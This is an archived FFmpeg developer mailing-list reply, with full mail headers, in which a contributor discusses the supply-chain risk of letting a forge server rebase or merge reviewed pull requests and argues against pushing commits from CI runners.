From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: from ffbox0-bg.ffmpeg.org (ffbox0-bg.ffmpeg.org [79.124.17.100]) by master.gitmailbox.com (Postfix) with ESMTPS id 0E4D94C6EA for ; Mon, 4 Aug 2025 20:16:06 +0000 (UTC) Received: from [127.0.1.1] (localhost [127.0.0.1]) by ffbox0-bg.ffmpeg.org (Postfix) with ESMTP id 066E968C356; Mon, 4 Aug 2025 23:16:03 +0300 (EEST) Received: from mout.gmx.net (mout.gmx.net [212.227.15.18]) by ffbox0-bg.ffmpeg.org (Postfix) with ESMTPS id 22F28687D16 for ; Mon, 4 Aug 2025 23:15:56 +0300 (EEST) X-UI-Sender-Class: 724b4f7f-cbec-4199-ad4e-598c01a50d3a Received: from metallschleim.local ([91.62.6.9]) by mail.gmx.net (mrgmx005 [212.227.17.190]) with ESMTPSA (Nemesis) id 1MTiPv-1vCYX00hqf-00NZ5H for ; Mon, 04 Aug 2025 22:15:55 +0200 Date: Mon, 4 Aug 2025 22:15:53 +0200 To: FFmpeg development discussions and patches Message-ID: References: <20250803153139.GC29660@pb2> <20250803190234.GE29660@pb2> MIME-Version: 1.0 Content-Disposition: inline In-Reply-To: <20250803190234.GE29660@pb2> X-Provags-ID: V03:K1:tkDcLp+TR4oJCDLurYQ4a9hjNxvXrYIqH/1SU5NVjoyxFBABi6A YH1303XWtH6a9yLmAf/FhcsvkoLNTcbWcUBooxV6Z+WW0gKkEgPuwkrfqDe9vgpiDmblV9I 6pFv7CrVpiC1q/ZlcdgAVaUSR5KpSSnpWxwy53MOoXpkx/NT0GifuWmrWjttuWzvNf5rDf5 v2JSyxg6I51JwdACIPokg== X-Spam-Flag: NO UI-OutboundReport: notjunk:1;M01:P0:Sd2BzDMTUGM=;gpklI+eYXrnnKIOQQ1tbVDFSCjS 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 Subject: Re: [FFmpeg-devel] rebasing security X-BeenThere: ffmpeg-devel@ffmpeg.org X-Mailman-Version: 2.1.29 Precedence: list List-Id: FFmpeg development discussions and patches List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , From: Alexander Strasser via ffmpeg-devel Reply-To: FFmpeg development discussions and patches Cc: Alexander Strasser Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Errors-To: ffmpeg-devel-bounces@ffmpeg.org Sender: "ffmpeg-devel" Archived-At: List-Archive: List-Post: Hi Michael, hi all! I think it's a good time to bring stuff like this up for discussion. On 2025-08-03 21:02 +0200, Michael Niedermayer wrote: > > On Sun, Aug 03, 2025 at 05:31:39PM +0200, Michael Niedermayer wrote: > [...] > > The solutions are obvious: > > 1. ignore security and supply chain attacks > > 2. use merges not rebases on the server > > 3. rebase locally, use fast forward only > > 4. verify on server rebases > > Maybe not everyone understood the problem. So let me try a different > explanation. Without any signatures. > > In the ML workflow: (for simplicity we assume reviewer and commiter is the same person) > 1. someone posts a patch > 2. patch is locally applied or rebased > 3. commit is reviewed > 4. commit is tested > 5. commit is pushed > > Here the only way to get bad code in, is through the reviewer > If the reviewer doesnt miss anything and his setup is not compromised > then what he pushes is teh reviewed code > > if its manipulated after its pushed git should light up like a christmess tree > on the next "git pull --rebase" > > > With the rebase on webapp (gitlab or forgejo) workflow > 1. someone posts a pull request > 2. pr is reviewed > 3. pr is approved > 4. pr is rebased > 5. pr is tested > 6, pr is pushed > > now here of course the same reviewer trust or compromised scenarios exist > but we also have an extra one and that is the server > because the server strips the signatures during rebase it can modify the > commit. And this happens after review and because a rebase was litterally > requested by the reviewer its not likely to be noticed as something out of > place If I understand the original point you wanted to discuss correctly, than this is not a question of rebase or merge but one of letting **commits happen on the forge**. If it happens it bears the possibility of modification on the server the forge is running on. TL;DR: I think it's fine the way it's setup now. I'm not against letting rebase/merges happen on the server because otherwise we would lose a lot of advantages and comfort we get by using a forge for PRs. Only alternative I see is to do PRs on the forge and doing merging manually by the same person that ensures reviewed PR is not changed and pushes (after rebase or with a clean merge commit) from their machine. Just to be clear here I'm talking about stuff happening for rebase/merge on the server. There is another thing that is done sometimes that I'm against, that is creating and pushing commits from runners. That is a way too dangerous practice IMHO and I would argue we should never do it. Best regards Alexander PS. Maybe there are some less conventional possibilities I'm missing, that could be implemented. So if you see any that seem worth to pursue it might be interesting. _______________________________________________ ffmpeg-devel mailing list ffmpeg-devel@ffmpeg.org https://ffmpeg.org/mailman/listinfo/ffmpeg-devel To unsubscribe, visit link above, or email ffmpeg-devel-request@ffmpeg.org with subject "unsubscribe".